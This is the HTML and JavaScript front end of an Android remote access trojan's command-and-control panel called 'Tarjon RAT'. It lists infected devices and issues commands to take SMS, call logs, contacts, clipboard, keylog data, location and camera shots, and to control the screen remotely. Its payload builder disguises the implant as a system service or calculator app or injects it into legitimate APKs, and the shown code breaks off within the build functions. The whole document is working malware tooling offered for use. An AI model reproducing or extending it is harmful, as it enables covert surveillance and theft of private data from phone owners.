<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tarjon RAT Command & Control</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        body {
            background-color: #f8f9fa;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        .sidebar {
            height: 100vh;
            background-color: #212529;
            color: #fff;
            position: sticky;
            top: 0;
            padding-top: 20px;
        }
        .sidebar-header {
            padding: 10px 15px;
            border-bottom: 1px solid #32383e;
        }
        .device-link {
            color: #ced4da;
            padding: 8px 15px;
            border-radius: 5px;
            margin-bottom: 5px;
        }
        .device-link:hover {
            background-color: #32383e;
            color: #fff;
        }
        .device-link.active {
            background-color: #0d6efd;
            color: #fff;
        }
        .badge-online {
            background-color: #198754;
            color: #fff;
        }
        .badge-offline {
            background-color: #dc3545;
            color: #fff;
        }
        .device-card {
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 1px 3px rgba(0,0,0,0.1);
            cursor: pointer;
            transition: all 0.2s;
        }
        .device-card:hover {
            box-shadow: 0 3px 6px rgba(0,0,0,0.15);
            transform: translateY(-2px);
        }
        .command-history {
            height: 250px;
            overflow-y: auto;
            background-color: #212529;
            color: #fff;
            padding: 10px;
            border-radius: 5px;
            font-family: 'Courier New', Courier, monospace;
        }
        .command-input {
            border-top-right-radius: 0;
            border-bottom-right-radius: 0;
            font-family: 'Courier New', Courier, monospace;
        }
        .send-btn {
            border-top-left-radius: 0;
            border-bottom-left-radius: 0;
        }
        .result-success {
            color: #198754;
        }
        .result-error {
            color: #dc3545;
        }
        .tab-content {
            margin-top: 20px;
        }
        .screenshot-container {
            text-align: center;
            margin-top: 20px;
        }
        .screenshot-img {
            max-width: 100%;
            border: 1px solid #dee2e6;
            border-radius: 5px;
            box-shadow: 0 3px 6px rgba(0,0,0,0.1);
        }
        .function-btn {
            margin-bottom: 10px;
        }
        .nav-tabs .nav-link {
            color: #495057;
        }
        .nav-tabs .nav-link.active {
            font-weight: 500;
        }
    </style>
</head>
<body>
    <div class="container-fluid">
        <div class="row">
            <!-- Sidebar -->
            <div class="col-md-3 col-lg-2 d-md-block sidebar collapse">
                <div class="sidebar-header d-flex justify-content-between align-items-center">
                    <h5 class="m-0">Devices (<span id="device-count">0</span>)</h5>
                    <button id="refresh-btn" class="btn btn-sm btn-outline-light"><i class="fas fa-sync-alt"></i></button>
                </div>
                <div class="mt-3">
                    <ul class="nav flex-column" id="device-list">
                        <!-- Devices will be listed here -->
                    </ul>
                    <div id="no-devices-message" class="text-center mt-3">
                        <p class="text-muted">No devices connected</p>
                    </div>
                </div>
            </div>
            
            <!-- Main content -->
            <div class="col-md-9 col-lg-10 ms-sm-auto px-md-4 py-4">
                <div class="d-flex justify-content-between flex-wrap flex-md-nowrap align-items-center pt-3 pb-2 mb-3 border-bottom">
                    <h1 class="h2">Tarjon RAT Control Panel</h1>
                    <div class="btn-toolbar mb-2 mb-md-0">
                        <div class="btn-group me-2">
                            <button type="button" class="btn btn-sm btn-outline-secondary" id="btn-settings">
                                <i class="fas fa-cog"></i> Settings
                            </button>
                            <button type="button" class="btn btn-sm btn-outline-secondary" id="btn-help">
                                <i class="fas fa-question-circle"></i> Help
                            </button>
                        </div>
                    </div>
                </div>
                
                <!-- Device Status Panel -->
                <div class="row mb-4">
                    <div class="col-lg-12">
                        <div class="card">
                            <div class="card-header">
                                <h5 class="card-title mb-0">Device Status</h5>
                            </div>
                            <div class="card-body">
                                <div id="device-status">
                                    <p class="text-center text-muted">No devices connected</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                
                <!-- Device Control Tabs -->
                <div class="row">
                    <div class="col-lg-12">
                        <ul class="nav nav-tabs" id="deviceTabs" role="tablist">
                            <li class="nav-item" role="presentation">
                                <button class="nav-link active" id="command-tab" data-bs-toggle="tab" data-bs-target="#command" type="button" role="tab" aria-controls="command" aria-selected="true">Command</button>
                            </li>
                            <li class="nav-item" role="presentation">
                                <button class="nav-link" id="screen-tab" data-bs-toggle="tab" data-bs-target="#screen" type="button" role="tab" aria-controls="screen" aria-selected="false">Screen</button>
                            </li>
                            <li class="nav-item" role="presentation">
                                <button class="nav-link" id="files-tab" data-bs-toggle="tab" data-bs-target="#files" type="button" role="tab" aria-controls="files" aria-selected="false">Files</button>
                            </li>
                            <li class="nav-item" role="presentation">
                                <button class="nav-link" id="apps-tab" data-bs-toggle="tab" data-bs-target="#apps" type="button" role="tab" aria-controls="apps" aria-selected="false">Apps</button>
                            </li>
                            <li class="nav-item" role="presentation">
                                <button class="nav-link" id="payload-tab" data-bs-toggle="tab" data-bs-target="#payload" type="button" role="tab" aria-controls="payload" aria-selected="false">Payload Builder</button>
                            </li>
                            <li class="nav-item" role="presentation">
                                <button class="nav-link" id="info-tab" data-bs-toggle="tab" data-bs-target="#info" type="button" role="tab" aria-controls="info" aria-selected="false">Info</button>
                            </li>
                        </ul>
                        <div class="tab-content" id="deviceTabsContent">
                            <!-- Command Tab -->
                            <div class="tab-pane fade show active" id="command" role="tabpanel" aria-labelledby="command-tab">
                                <div class="row">
                                    <div class="col-lg-8">
                                        <h5>Command Terminal</h5>
                                        <div class="command-history" id="command-history">
                                            <div class="text-muted">Select a device and start issuing commands...</div>
                                        </div>
                                        <div class="input-group mt-3">
                                            <input type="text" class="form-control command-input" id="command-input" placeholder="Enter command...">
                                            <button class="btn btn-primary send-btn" id="send-command-btn">Send</button>
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <h5>Quick Commands</h5>
                                        <div class="d-grid gap-2">
                                            <button class="btn btn-outline-primary function-btn" data-command="device_info">Device Info</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="screenshot">Take Screenshot</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="camera:front">Front Camera</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="camera:back">Back Camera</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="location">Get Location</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="sms:100">Get SMS</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="call_logs:100">Call Logs</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="contacts">Get Contacts</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="clipboard">Get Clipboard</button>
                                            <button class="btn btn-outline-primary function-btn" data-command="keylog">Get Keylog Data</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Screen Tab -->
                            <div class="tab-pane fade" id="screen" role="tabpanel" aria-labelledby="screen-tab">
                                <div class="row">
                                    <div class="col-lg-9">
                                        <div class="screenshot-container">
                                            <img id="screenshot-img" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=" class="screenshot-img" alt="Device Screen">
                                        </div>
                                    </div>
                                    <div class="col-lg-3">
                                        <h5>Screen Control</h5>
                                        <div class="d-grid gap-2">
                                            <button class="btn btn-outline-primary function-btn" id="refresh-screen-btn">Refresh Screen</button>
                                            <button class="btn btn-outline-primary function-btn" id="home-btn" data-command="home">Home</button>
                                            <button class="btn btn-outline-primary function-btn" id="back-btn" data-command="back">Back</button>
                                            <button class="btn btn-outline-primary function-btn" id="recents-btn" data-command="openRecentApps">Recent Apps</button>
                                            <button class="btn btn-outline-primary function-btn" id="notifications-btn" data-command="openNotifications">Notifications</button>
                                            <hr>
                                            <input type="text" class="form-control mb-2" id="touch-x" placeholder="X coordinate">
                                            <input type="text" class="form-control mb-2" id="touch-y" placeholder="Y coordinate">
                                            <button class="btn btn-outline-primary" id="touch-btn">Tap</button>
                                            <hr>
                                            <input type="text" class="form-control mb-2" id="input-text" placeholder="Text to input">
                                            <button class="btn btn-outline-primary" id="input-text-btn">Input Text</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Files Tab -->
                            <div class="tab-pane fade" id="files" role="tabpanel" aria-labelledby="files-tab">
                                <h5>File Explorer</h5>
                                <div class="file-explorer">
                                    <!-- File explorer will be implemented here -->
                                    <p class="text-muted">Select a device to browse files</p>
                                </div>
                            </div>
                            
                            <!-- Apps Tab -->
                            <div class="tab-pane fade" id="apps" role="tabpanel" aria-labelledby="apps-tab">
                                <h5>Installed Applications</h5>
                                <div class="app-list">
                                    <!-- App list will be populated here -->
                                    <p class="text-muted">Select a device to view installed applications</p>
                                </div>
                            </div>
                            
                            <!-- Payload Builder Tab -->
                            <div class="tab-pane fade" id="payload" role="tabpanel" aria-labelledby="payload-tab">
                                <div class="row mb-4">
                                    <div class="col-lg-12">
                                        <div class="card">
                                            <div class="card-header bg-danger text-white">
                                                <h5 class="card-title mb-0">Android Payload Generator</h5>
                                            </div>
                                            <div class="card-body">
                                                <ul class="nav nav-tabs" id="payloadTabs" role="tablist">
                                                    <li class="nav-item" role="presentation">
                                                        <button class="nav-link active" id="standalone-tab" data-bs-toggle="tab" data-bs-target="#standalone" type="button" role="tab" aria-controls="standalone" aria-selected="true">Standalone APK</button>
                                                    </li>
                                                    <li class="nav-item" role="presentation">
                                                        <button class="nav-link" id="binding-tab" data-bs-toggle="tab" data-bs-target="#binding" type="button" role="tab" aria-controls="binding" aria-selected="false">APK Binding</button>
                                                    </li>
                                                    <li class="nav-item" role="presentation">
                                                        <button class="nav-link" id="history-tab" data-bs-toggle="tab" data-bs-target="#history" type="button" role="tab" aria-controls="history" aria-selected="false">Build History</button>
                                                    </li>
                                                </ul>
                                                
                                                <div class="tab-content pt-3" id="payloadTabsContent">
                                                    <!-- Standalone APK Builder -->
                                                    <div class="tab-pane fade show active" id="standalone" role="tabpanel" aria-labelledby="standalone-tab">
                                                        <form id="standalone-form">
                                                            <div class="mb-3">
                                                                <label for="app-name" class="form-label">Application Name</label>
                                                                <input type="text" class="form-control" id="app-name" placeholder="Enter application name" value="System Service">
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="app-package" class="form-label">Package Name</label>
                                                                <input type="text" class="form-control" id="app-package" placeholder="com.example.app" value="com.android.system">
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="app-template" class="form-label">Application Template</label>
                                                                <select class="form-select" id="app-template">
                                                                    <option value="system_service" selected>System Service</option>
                                                                    <option value="calculator">Calculator</option>
                                                                    <option value="file_manager">File Manager</option>
                                                                </select>
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="app-icon" class="form-label">Application Icon</label>
                                                                <input type="file" class="form-control" id="app-icon" accept="image/*">
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="c2-server" class="form-label">Command & Control Server</label>
                                                                <input type="text" class="form-control" id="c2-server" placeholder="https://your-c2-server.com" value="">
                                                                <div class="form-text">Leave empty to use the current server</div>
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="api-key" class="form-label">API Key</label>
                                                                <input type="text" class="form-control" id="api-key" placeholder="Optional API key for C2 server">
                                                            </div>
                                                                
                                                            <div class="d-grid gap-2">
                                                                <button type="button" id="build-standalone-btn" class="btn btn-danger">
                                                                    <i class="fas fa-cogs"></i> Build Standalone APK
                                                                </button>
                                                            </div>
                                                        </form>
                                                    </div>
                                                    
                                                    <!-- APK Binding -->
                                                    <div class="tab-pane fade" id="binding" role="tabpanel" aria-labelledby="binding-tab">
                                                        <form id="binding-form">
                                                            <div class="mb-3">
                                                                <label for="legitimate-apk" class="form-label">Legitimate APK</label>
                                                                <input type="file" class="form-control" id="legitimate-apk" accept=".apk">
                                                                <div class="form-text">Select a legitimate APK to inject payload into</div>
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="bind-c2-server" class="form-label">Command & Control Server</label>
                                                                <input type="text" class="form-control" id="bind-c2-server" placeholder="https://your-c2-server.com" value="">
                                                                <div class="form-text">Leave empty to use the current server</div>
                                                            </div>
                                                            
                                                            <div class="mb-3">
                                                                <label for="bind-api-key" class="form-label">API Key</label>
                                                                <input type="text" class="form-control" id="bind-api-key" placeholder="Optional API key for C2 server">
                                                            </div>
                                                            
                                                            <div class="mb-3 form-check">
                                                                <input type="checkbox" class="form-check-input" id="preserve-functionality" checked>
                                                                <label class="form-check-label" for="preserve-functionality">Preserve original app functionality</label>
                                                                <div class="form-text">If checked, the original app will still function normally</div>
                                                            </div>
                                                                
                                                            <div class="d-grid gap-2">
                                                                <button type="button" id="build-binding-btn" class="btn btn-danger">
                                                                    <i class="fas fa-virus"></i> Bind to Legitimate APK
                                                                </button>
                                                            </div>
                                                        </form>
                                                    </div>
                                                    
                                                    <!-- Build History -->
                                                    <div class="tab-pane fade" id="history" role="tabpanel" aria-labelledby="history-tab">
                                                        <div class="table-responsive">
                                                            <table class="table table-striped table-hover">
                                                                <thead>
                                                                    <tr>
                                                                        <th>Timestamp</th>
                                                                        <th>Type</th>
                                                                        <th>Name</th>
                                                                        <th>Size</th>
                                                                        <th>Actions</th>
                                                                    </tr>
                                                                </thead>
                                                                <tbody id="build-history-table">
                                                                    <tr>
                                                                        <td colspan="5" class="text-center">No build history available</td>
                                                                    </tr>
                                                                </tbody>
                                                            </table>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <!-- Build Progress -->
                                <div class="row" id="build-progress-container" style="display: none;">
                                    <div class="col-lg-12">
                                        <div class="card">
                                            <div class="card-header">
                                                <h5 class="card-title mb-0">Build Progress</h5>
                                            </div>
                                            <div class="card-body">
                                                <div class="progress mb-3">
                                                    <div id="build-progress-bar" class="progress-bar progress-bar-striped progress-bar-animated bg-danger" role="progressbar" style="width: 0%" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100">0%</div>
                                                </div>
                                                <p id="build-status-message">Preparing build process...</p>
                                                
                                                <div id="build-result" style="display: none;">
                                                    <hr>
                                                    <h5>Build Completed</h5>
                                                    <div class="alert alert-success">
                                                        <h6 id="build-result-title">APK built successfully</h6>
                                                        <p id="build-result-path">Path: <span id="build-path"></span></p>
                                                        <p>Size: <span id="build-size"></span></p>
                                                        <div class="d-grid gap-2">
                                                            <button type="button" id="download-build-btn" class="btn btn-primary">
                                                                <i class="fas fa-download"></i> Download APK
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Info Tab -->
                            <div class="tab-pane fade" id="info" role="tabpanel" aria-labelledby="info-tab">
                                <h5>Device Information</h5>
                                <div class="device-info">
                                    <!-- Device info will be displayed here -->
                                    <p class="text-muted">Select a device to view detailed information</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script>
    <script src="/assets/js/main.js"></script>
    <script>
        
        document.addEventListener('DOMContentLoaded', function() {
            // Initialize WebSocket connection
            initWebSocket();
            
            // Load initial data
            fetchDevices();
            
            // Setup event listeners
            setupEventListeners();
        });
        
        function initWebSocket() {
            // Create socket.io connection
            socket = io.connect();
            
            // Connection established
            socket.on('connect', function() {
                console.log('Socket.io connection established');
                addStatusMessage('Connected to C2 server');
            });
            
            // Disconnection
            socket.on('disconnect', function() {
                console.log('Socket.io disconnected');
                addStatusMessage('Disconnected from C2 server', 'error');
            });
            
            // Device updates
            socket.on('device_update', function(data) {
                console.log('Received device update:', data);
                updateDeviceList(data.devices);
            });
            
            // Command results
            socket.on('command_result', function(data) {
                console.log('Received command result:', data);
                addCommandResult(data.result);
                
                // If this is a screenshot, update the screenshot image
                if (data.result.includes('data:image/') || data.result.includes('base64')) {
                    updateScreenshot(data.result);
                }
            });
            
            // Status messages
            socket.on('status', function(data) {
                console.log('Received status:', data);
                addStatusMessage(data.message);
            });
            
            // Error messages
            socket.on('error', function(data) {
                console.error('Socket.io error:', data);
                addStatusMessage(data.message, 'error');
            });
        }
        
        function setupEventListeners() {
            // Send command button
            document.getElementById('send-command-btn').addEventListener('click', sendCommand);
            
            // Command input
            document.getElementById('command-input').addEventListener('keypress', function(e) {
                if (e.key === 'Enter') {
                    sendCommand();
                }
            });
            
            // Command history navigation
            document.getElementById('command-input').addEventListener('keydown', function(e) {
                if (e.key === 'ArrowUp') {
                    navigateCommandHistory('up');
                } else if (e.key === 'ArrowDown') {
                    navigateCommandHistory('down');
                }
            });
            
            // Payload Builder buttons
            document.getElementById('build-standalone-btn').addEventListener('click', buildStandaloneApk);
            document.getElementById('build-binding-btn').addEventListener('click', bindToLegitimateApk);
            document.getElementById('download-build-btn').addEventListener('click', downloadBuild);
            
            // Refresh button
            document.getElementById('refresh-btn').addEventListener('click', fetchDevices);
            
            // Quick command buttons
            document.querySelectorAll('.function-btn[data-command]').forEach(button => {
                button.addEventListener('click', function() {
                    if (currentDeviceId) {
                        const command = this.getAttribute('data-command');
                        document.getElementById('command-input').value = command;
                        sendCommand();
                    } else {
                        addStatusMessage('Please select a device first', 'error');
                    }
                });
            });
            
            // Screen control buttons
            document.getElementById('refresh-screen-btn').addEventListener('click', function() {
                if (currentDeviceId) {
                    document.getElementById('command-input').value = 'screenshot';
                    sendCommand();
                } else {
                    addStatusMessage('Please select a device first', 'error');
                }
            });
            
            // Home, back, etc. buttons
            ['home-btn', 'back-btn', 'recents-btn', 'notifications-btn'].forEach(id => {
                document.getElementById(id).addEventListener('click', function() {
                    if (currentDeviceId) {
                        const command = this.getAttribute('data-command');
                        document.getElementById('command-input').value = command;
                        sendCommand();
                    } else {
                        addStatusMessage('Please select a device first', 'error');
                    }
                });
            });
            
            // Tap button
            document.getElementById('touch-btn').addEventListener('click', function() {
                if (currentDeviceId) {
                    const x = document.getElementById('touch-x').value;
                    const y = document.getElementById('touch-y').value;
                    if (x && y) {
                        document.getElementById('command-input').value = `touch:${x},${y}`;
                        sendCommand();
                    } else {
                        addStatusMessage('Please enter X and Y coordinates', 'error');
                    }
                } else {
                    addStatusMessage('Please select a device first', 'error');
                }
            });
            
            // Input text button
            document.getElementById('input-text-btn').addEventListener('click', function() {
                if (currentDeviceId) {
                    const text = document.getElementById('input-text').value;
                    if (text) {
                        document.getElementById('command-input').value = `input_text:${text}`;
                        sendCommand();
                    } else {
                        addStatusMessage('Please enter text to input', 'error');
                    }
                } else {
                    addStatusMessage('Please select a device first', 'error');
                }
            });
        }
        
        function fetchDevices() {
            fetch('/api/devices')
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                    return response.json();
                })
                .then(data => {
                    if (data.status === 'ok') {
                        updateDeviceList(data.devices);
                        updateDeviceCount(data.devices.length);
                    } else {
                        addStatusMessage('Error fetching devices: ' + data.message, 'error');
                    }
                })
                .catch(error => {
                    console.error('Error fetching devices:', error);
                    addStatusMessage('Error connecting to server', 'error');
                });
        }
        
        function updateDeviceList(devices) {
            const deviceList = document.getElementById('device-list');
            const noDevicesMessage = document.getElementById('no-devices-message');
            
            // Clear current list
            deviceList.innerHTML = '';
            
            if (devices && devices.length > 0) {
                // Hide the no devices message
                noDevicesMessage.style.display = 'none';
                
                // Add each device to the list
                devices.forEach(device => {
                    const li = document.createElement('li');
                    li.className = 'nav-item';
                    
                    const lastSeen = new Date(device.last_seen);
                    const timeAgo = getTimeAgo(lastSeen);
                    
                    // Determine online status (consider device online if seen in the last 5 minutes)
                    const isOnline = (Date.now() - lastSeen.getTime()) < 5 * 60 * 1000;
                    const statusClass = isOnline ? 'badge-online' : 'badge-offline';
                    const statusText = isOnline ? 'Online' : 'Offline';
                    
                    li.innerHTML = `
                        <a class="nav-link device-link" href="#" data-device-id="${device.device_id}">
                            <div class="d-flex justify-content-between align-items-center">
                                <span><i class="fas fa-mobile-alt"></i> ${device.device_id.substring(0, 8)}...</span>
                                <span class="badge rounded-pill ${statusClass}">${statusText}</span>
                            </div>
                            <small class="text-muted">${timeAgo}</small>
                        </a>
                    `;
                    
                    deviceList.appendChild(li);
                });
                
                // Add click event to device links
                document.querySelectorAll('.device-link').forEach(link => {
                    link.addEventListener('click', function(e) {
                        e.preventDefault();
                        // Handle device selection
                        selectDevice(this.getAttribute('data-device-id'));
                    });
                });
                
                // Update device status section
                updateDeviceStatus(devices);
            } else {
                // Show the no devices message
                noDevicesMessage.style.display = 'block';
                document.getElementById('device-status').innerHTML = '<p class="text-center text-muted">No devices connected</p>';
            }
        }
        
        function updateDeviceCount(count) {
            document.getElementById('device-count').textContent = count;
        }
        
        function updateDeviceStatus(devices) {
            const statusContainer = document.getElementById('device-status');
            statusContainer.innerHTML = '';
            
            devices.forEach(device => {
                const lastSeen = new Date(device.last_seen);
                const timeAgo = getTimeAgo(lastSeen);
                
                // Determine online status
                const isOnline = (Date.now() - lastSeen.getTime()) < 5 * 60 * 1000;
                const statusClass = isOnline ? 'text-success' : 'text-danger';
                const statusText = isOnline ? 'Online' : 'Offline';
                
                const deviceCard = document.createElement('div');
                deviceCard.className = 'device-card p-2 mb-2';
                deviceCard.innerHTML = `
                    <div class="d-flex justify-content-between align-items-center">
                        <div>
                            <h6 class="mb-0">${device.device_id.substring(0, 8)}...</h6>
                            <small class="text-muted">${device.ip_address || 'Unknown IP'}</small>
                        </div>
                        <div>
                            <span class="${statusClass}"><i class="fas fa-circle"></i> ${statusText}</span>
                        </div>
                    </div>
                    <div class="mt-1">
                        <small class="text-muted">Last seen: ${timeAgo}</small>
                    </div>
                `;
                
                deviceCard.addEventListener('click', function() {
                    selectDevice(device.device_id);
                });
                
                statusContainer.appendChild(deviceCard);
            });
        }
        
        function selectDevice(deviceId) {
            currentDeviceId = deviceId;
            
            // Highlight selected device
            document.querySelectorAll('.device-link').forEach(link => {
                if (link.getAttribute('data-device-id') === deviceId) {
                    link.classList.add('active');
                } else {
                    link.classList.remove('active');
                }
            });
            
            // Display device selection
            addStatusMessage(`Device selected: ${deviceId.substring(0, 8)}...`);
            
            // Request device info
            document.getElementById('command-input').value = 'device_info';
            sendCommand();
        }
        
        function sendCommand() {
            if (!currentDeviceId) {
                addStatusMessage('Please select a device first', 'error');
                return;
            }
            
            const commandInput = document.getElementById('command-input');
            const command = commandInput.value.trim();
            
            if (!command) {
                addStatusMessage('Please enter a command', 'error');
                return;
            }
            
            // Add to history
            commandHistory.push(command);
            historyIndex = commandHistory.length;
            
            // Send command to server
            socket.emit('send_command', {
                device_id: currentDeviceId,
                command: command
            });
            
            // Display in console
            addCommandResult(`$ ${command}`, 'command');
            
            // Clear input
            commandInput.value = '';
            
            // Focus input
            commandInput.focus();
        }
        
        function navigateCommandHistory(direction) {
            if (commandHistory.length === 0) return;
            
            if (direction === 'up') {
                historyIndex = Math.max(0, historyIndex - 1);
            } else {
                historyIndex = Math.min(commandHistory.length, historyIndex + 1);
            }
            
            if (historyIndex < commandHistory.length) {
                document.getElementById('command-input').value = commandHistory[historyIndex];
            } else {
                document.getElementById('command-input').value = '';
            }
        }
        
        function addCommandResult(result, type = 'result') {
            const historyContainer = document.getElementById('command-history');
            const entry = document.createElement('div');
            
            if (type === 'command') {
                entry.className = 'command-entry';
                entry.innerHTML = `<span class="text-info">${result}</span>`;
            } else if (type === 'error') {
                entry.className = 'result-entry result-error';
                entry.textContent = result;
            } else {
                entry.className = 'result-entry';
                
                // Check if result contains an image
                if (result.includes('data:image/') || result.includes('base64')) {
                    entry.innerHTML = '<span class="text-success">[Image data received]</span>';
                    updateScreenshot(result);
                } else {
                    entry.textContent = result;
                }
            }
            
            historyContainer.appendChild(entry);
            historyContainer.scrollTop = historyContainer.scrollHeight;
        }
        
        function updateScreenshot(imageData) {
            // Extract base64 data from the result if needed
            let base64Data = imageData;
            
            // Handle various formats that might be returned
            if (imageData.includes('data:image/')) {
                // Already in data URL format
                base64Data = imageData;
            } else if (imageData.includes('"image"') && imageData.includes('"data"')) {
                // JSON format with image data
                try {
                    const data = JSON.parse(imageData);
                    if (data.image && data.data) {
                        base64Data = `data:image/${data.image};base64,${data.data}`;
                    }
                } catch (e) {
                    console.error('Error parsing screenshot data:', e);
                }
            } else if (imageData.includes('base64')) {
                // Contains base64 data but not in data URL format
                const match = imageData.match(/base64,([^"'\s]+)/);
                if (match && match[1]) {
                    base64Data = `data:image/jpeg;base64,${match[1]}`;
                }
            }
            
            // Update the screenshot image
            document.getElementById('screenshot-img').src = base64Data;
            
            // Switch to screenshot tab
            document.getElementById('screen-tab').click();
        }
        
        function addStatusMessage(message, type = 'info') {
            const historyContainer = document.getElementById('command-history');
            const entry = document.createElement('div');
            
            if (type === 'error') {
                entry.className = 'status-message text-danger';
            } else {
                entry.className = 'status-message text-secondary';
            }
            
            entry.innerHTML = `<i class="fas fa-info-circle"></i> ${message}`;
            historyContainer.appendChild(entry);
            historyContainer.scrollTop = historyContainer.scrollHeight;
        }
        
        function getTimeAgo(date) {
            const seconds = Math.floor((new Date() - date) / 1000);
            
            if (seconds < 60) {
                return `${seconds} seconds ago`;
            }
            
            const minutes = Math.floor(seconds / 60);
            if (minutes < 60) {
                return `${minutes} minute${minutes !== 1 ? 's' : ''} ago`;
            }
            
            const hours = Math.floor(minutes / 60);
            if (hours < 24) {
                return `${hours} hour${hours !== 1 ? 's' : ''} ago`;
            }
            
            const days = Math.floor(hours / 24);
            return `${days} day${days !== 1 ? 's' : ''} ago`;
        }
        // Payload Builder Functions
        
        // Build history array to store previous builds
        let buildHistory = [];
        let currentBuildPath = null;
        
        /**
         * Build a standalone APK
         */
        function buildStandaloneApk() {
            // Show build progress container
            const buildProgressContainer = document.getElementById('build-progress-container');
            buildProgressContainer.style.display = 'block';
            
            // Hide build result
            document.getElementById('build-result').style.display = 'none';
            
            // Reset progress bar
            updateBuildProgress(0, 'Preparing build process...');
            
            // Get form values
            const appName = document.getElementById('app-name').value;
            const packageName = document.getElementById('app-package').value;
            const template = document.getElementById('app-template').value;
            const c2Server = document.getElementById('c2-server').value;
            const apiKey = document.getElementById('api-key').value;
            
            // Get app icon
            const iconInput = document.getElementById('app-icon');
            let iconBase64 = null;
            
            if (iconInput.files && iconInput.files[0]) {
                const reader = new FileReader();
                
                reader.onload = function(e) {
                    // Get base64 data from file reader result
                    iconBase64 = e.target.result.split(',')[1]; // Remove data URL prefix
                    
                    // Now we have the icon, proceed with build request
                    sendBuildRequest('standalone', {
                        appName,
                        packageName,
                        template,
                        c2Server,
                        apiKey,
                        iconBase64
                    });
                };
                
                reader.readAsDataURL(iconInput.files[0]);
            } else {
                // No icon selected, proceed with build request
                sendBuildRequest('standalone', {
                    appName,
                    packageName,
                    template,
                    c2Server,
                    apiKey
                });
            }
        }
        
        /**
         * Bind to legitimate APK
         */
        function bindToLegitimateApk() {
            // Show build progress container
            const buildProgressContainer = document.getElementById('build-progress-container');
            buildProgressContainer.style.display = 'block';
            
            // Hide build result
            document.getElementById('build-result').style.display = 'none';
            
            // Reset progress bar
            updateBuildProgress(0, 'Preparing binding process...');
            
            // Get form values
            const c2Server = document.getElementById('bind-c2-server').value;
            const apiKey = document.getElementById('bind-api-key').value;
            const preserveFunctionality = document.getElementById('preserve-functionality').checked;
            
            // Get legitimate APK
            const apkInput = document.getElementById('legitimate-apk');
            
            if (apkInput.files && apkInput.files[0]) {
                const reader = new FileReader();
                
                reader.onload = function(e) {
                    // Get base64 data from file reader result
                    const apkBase64 = e.target.result.split(',')[1]; // Remove data URL prefix
                    
                    // Proceed with binding request
                    sendBuildRequest('binding', {
                        legitimateApk: {
                            name: apkInput.files[0].name,
                            data: apkBase64
                        },
                        c2Server,
                        apiKey,
                        preserveFunctionality
                    });
                };
                
                // Show upload progress for large APKs
                updateBuildProgress(5, 'Reading APK file...');
                
                reader.onprogress = function(e) {
                    if (e.lengthComputable) {
                        const percentComplete = Math.round((e.loaded / e.total) * 10);
                        updateBuildProgress(percentComplete, 'Reading APK file...');
                    }
                };
                
                reader.readAsDataURL(apkInput.files[0]);
            } else {
                // No APK selected
                updateBuildProgress(0, 'Error: No legitimate APK selected');
                setTimeout(() => {
                    buildProgressContainer.style.display = 'none';
                }, 3000);
            }
        }
        
        /**
         * Send build request to server
         */
        function sendBuildRequest(type, config) {
            // Update progress
            updateBuildProgress(15, 'Sending build request to server...');
            
            // Simulate server request (in a real implementation, this would be an actual AJAX request)
            socket.emit('build_payload', {
                type: type,
                config: config
            });
            
            // Set up listeners for build progress and completion
            socket.on('build_progress', (data) => {
                updateBuildProgress(data.progress, data.message);
            });
            
            socket.on('build_complete', (data) => {
                buildComplete(data);
            });
            
            socket.on('build_error', (data) => {
                buildError(data.message);
            });
        }
        
        /**
         * Handle build completion
         */
        function buildComplete(data) {
            // Update progress to 100%
            updateBuildProgress(100, 'Build completed successfully!');
            
            // Show build result
            const buildResult = document.getElementById('build-result');
            buildResult.style.display = 'block';
            
            // Update result details
            document.getElementById('build-result-title').textContent = data.type === 'standalone' ? 
                'Standalone APK built successfully' : 'APK binding completed successfully';
                
            document.getElementById('build-path').textContent = data.outputPath;
            document.getElementById('build-size').textContent = formatFileSize(data.fileSize);
            
            // Store current build path for download
            currentBuildPath = data.outputPath;
            
            // Add to build history
            const buildEntry = {
                timestamp: new Date(),
                type: data.type,
                name: data.appName || data.originalAppName || 'Unknown',
                size: data.fileSize,
                path: data.outputPath
            };
            
            buildHistory.push(buildEntry);
            updateBuildHistory();
        }
        
        /**
         * Handle build error
         */
        function buildError(message) {
            // Update progress
            updateBuildProgress(0, `Error: ${message}`);
            
            // Hide build result
            document.getElementById('build-result').style.display = 'none';
        }
